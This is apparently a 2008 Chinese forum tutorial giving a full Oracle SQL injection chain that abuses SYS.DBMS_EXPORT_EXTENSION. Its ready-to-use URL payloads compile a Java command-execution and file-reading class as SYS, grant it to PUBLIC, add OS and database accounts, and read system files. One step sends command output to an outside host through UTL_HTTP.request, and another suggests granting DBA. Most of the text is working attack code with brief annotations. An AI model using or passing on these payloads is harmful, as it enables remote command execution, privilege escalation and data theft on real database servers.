以下的演示都是在 web 上的 SQL*Plus 中执行的；在 web 注入时，把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。（用 'a'|| 是为了让语句返回 true 值：子查询返回 NULL 时 '1'<>NULL 的结果不为真，而 Oracle 里 'a'||NULL = 'a'，拼上之后比较恒为真，注入的语句照样会被执行。）
语句有点长，可能要用 POST 提交。
注意：整条链路依赖 SYS.DBMS_EXPORT_EXTENSION 的 PL/SQL 注入缺陷——注入进去的语句会以 SYS 的权限执行（所以后面创建的函数都在 SYS 模式下，调用时要写 sys.LinxRunCMD），只在未修补该缺陷的 Oracle 版本上有效；另外注入点要允许带子查询和 || 拼接的表达式。
以下是各个步骤:
1. 创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在 Oracle 上创建 Java 源 LinxUtil，里面两个函数：runCMD 用于执行系统命令，readFile 用于读取文件。runCMD 把整个字符串交给 Runtime.exec()，只读取命令的标准输出（getInputStream()），标准错误会丢掉；两个函数出错时都返回异常信息文本，而不是抛错。
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
（注意第三个参数开头是 DBMS_OUTPUT".PUT(:P1); ——原帖里的 ":P" 被论坛当成表情吞掉了，显示成了 PUT( 1)；后面用 chr() 拼出的版本里可以看到正确的 chr(58)||chr(80)||chr(49)，即 :P1。）
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
同时把后面步骤提到的对 readFile() 的处理语句（第 3 步的 LinxReadFile、第 4 步对它的 grant）去掉。
------------------------------
2. 赋 Java 权限（让 PUBLIC 对所有文件拥有 execute 权限，runCMD 才能启动外部进程）
注意这里只授了 execute；readFile() 用 FileReader 读文件需要的是 read 权限，如果后面 LinxReadFile 返回 java.security.AccessControlException 之类的异常文本，就按同样方式再授一次 read 权限（把 execute 换成 read）。
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. 创建函数（把 Java 方法包装成 SQL 里可以直接调用的 PL/SQL 函数）
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
4. 赋 public 执行函数的权限（注入点使用的数据库账号通常不是 SYS，不授权就调不到这两个函数）
注意这一步之后数据库里任何账号都能通过 sys.LinxRunCMD 执行操作系统命令，测试完一定要按第 7 步清理。
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5. 测试上面的几步是否成功（对象存在时子查询返回 OBJECT_ID，条件为真；不存在时子查询为空，条件为假。函数名创建时没加引号，Oracle 会转成大写，所以这里查的是 LINXRUNCMD / LINXREADFILE）
and '1'<>'11'||(
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
)
and '1'<>(
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
)
6. 执行命令（命令在数据库服务器主机上运行；下面的例子会在服务器上新建一个操作系统账号 linx，属于持久性改动，测试后记得删掉）:
/xxx.jsp?id=1 and '1'<>(
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
)

/xxx.jsp?id=1 and '1'<>(
select sys.LinxReadFile('c:/boot.ini') from dual
)
注意 sys.LinxReadFile() 返回的是 varchar 类型，不能用 "and 1<>" 代替 "and '1'<>"（数字和字符串比较时 Oracle 会尝试把返回的字符串隐式转成数字，多半会直接报错，页面出错而不是返回结果）。
如果要查看运行结果可以用 union（列数和列类型要与原查询一致，不够的列用 null 补齐）:
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request() 把结果带外发送出去（http://211.71.147.3/record.php 是作者自己的接收端，要换成自己控制的主机）:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),CHR(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),CHR(10),'%0A')) FROM dual
)
注意：用 UTL_HTTP.request 时，要用 REPLACE() 把空格、换行符替换掉，否则 URL 不合法，请求发不出去。Oracle 的字符串字面量不解释反斜杠转义，'\n' 只是反斜杠和 n 两个字符，替换不掉换行；换行要写成 CHR(10)（runCMD/readFile 里每行末尾拼的 Java "\n" 就是 CHR(10)）。用 utl_encode.base64_encode 也可以（它的参数是 RAW，要先 utl_raw.cast_to_raw()），但 base64 里的 +、/、= 同样要做 URL 编码。
--------------------
6. 内部变化
通过以下查询可以查看 all_objects 中的改变（新增了哪些对象）。未加引号的函数名 LinxRunCMD / LinxReadFile 被 Oracle 转成了大写，而 Java 源是用双引号创建的 "LinxUtil"，保留了大小写，所以两个 like 条件都要有:
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
7. 删除我们创建的函数
注意下面只 drop 了 LinxRunCMD；LinxReadFile、Java 源 "LinxUtil"、第 2 步授给 PUBLIC 的 FilePermission，以及第 6 步在服务器上建的操作系统账号 linx 都还留着。测试环境里应一并清理：用同样的方式执行 drop function LinxReadFile 和 drop java source "LinxUtil"，用 dbms_java.revoke_permission（参数与 grant_permission 相同）收回权限，再在服务器上执行 net user linx /del。
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法（不需要 Java，只看注入的 DDL 能否建出数据库用户）:
创建 oracle 帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即（整个载荷用 chr() 拼接，不含引号；注意此时字符串不再套在 SQL 字面量里，所以里面的引号只有一层和两层，而不是上面的两层和四层）:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在（查到 user_id 说明用户已被建出来，即注入的 DDL 以足够高的权限执行了）:
1<>(
select user_id from all_users where username='LINXSQL'
)
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行任意一条语句的函数 Linx_query()，执行成功的话返回数值 "1"。但它声明了 authid current_user，以调用者的权限运行，而注入点用的账号可能只有 public 权限，作用似乎不大；真的要用的话可以考虑先用上面的方式 grant dba to 当前的 User:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
)
（原文到这里还有一段示例，但已截断且有错漏，只剩开头：... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE ...；完整写法参照上面的模板。）